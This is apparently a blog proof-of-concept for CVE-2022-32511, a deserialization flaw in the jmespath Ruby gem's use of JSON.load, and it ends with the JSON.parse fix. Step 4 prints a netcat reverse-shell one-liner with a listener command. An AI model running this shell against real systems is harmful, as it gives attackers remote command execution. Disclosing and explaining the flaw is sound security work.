Here's a Proof-Of-Concept for CVE-2022-32511 to Gain Remote Code Execution

by Dhanesh Dodia (@heydanny), July 25th, 2022

Too Long; Didn't Read

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of `JSON.load`, which is considered unsafe when used with untrusted input. To reproduce the steps, we first need to install JMESPath 1.6.0 or earlier. Pick the desired payload; I have picked one from pentestmonkey.net/cheat-sheet/shells/reverse-shells.

Description

Affected versions of this package (the jmespath Ruby gem, 1.6.0 and earlier; fixed in 1.6.1) are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input. With its default options, JSON.load treats a "json_class" key in the document as an instruction to instantiate the named Ruby class from the surrounding fields (through that class's json_create method), so a crafted JSON document chooses which classes get built from attacker data. JSON.parse never does this.



Proof-of-concept

1. To reproduce the steps, we first need to install JMESPath 1.6.0 or earlier (the fix shipped in 1.6.1):

gem install jmespath -v 1.6.0


2. To import the library, start the Interactive Ruby Shell with the following command:

irb


3. In case you don't have irb installed, use the following command to install it (the gem name is lowercase):

gem install irb


4. Pick the desired payload. I have picked the netcat reverse shell from pentestmonkey; replace 'IP' with the address of your listener and have the listener waiting (for example, nc -lvnp 1234) before the payload is triggered:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f


5. Finally, import the vulnerable JMESPath library in irb and supply the payload so that it passes through the gem's JSON.load call, which executes the reverse shell.


Conclusion

It is recommended to use JSON.parse instead of JSON.load on any input you do not control, which is exactly the change jmespath.rb 1.6.1 made. The problem is not that JSON.load fails to validate the data: with its default options it deliberately honors a "json_class" key and instantiates the named Ruby class from the document's fields, so a crafted JSON document can drive arbitrary classes and, with a suitable gadget, Remote Code Execution. JSON.parse returns plain Hash and Array values and never consults "json_class"; if JSON.load's other defaults are needed, call it with create_additions: false.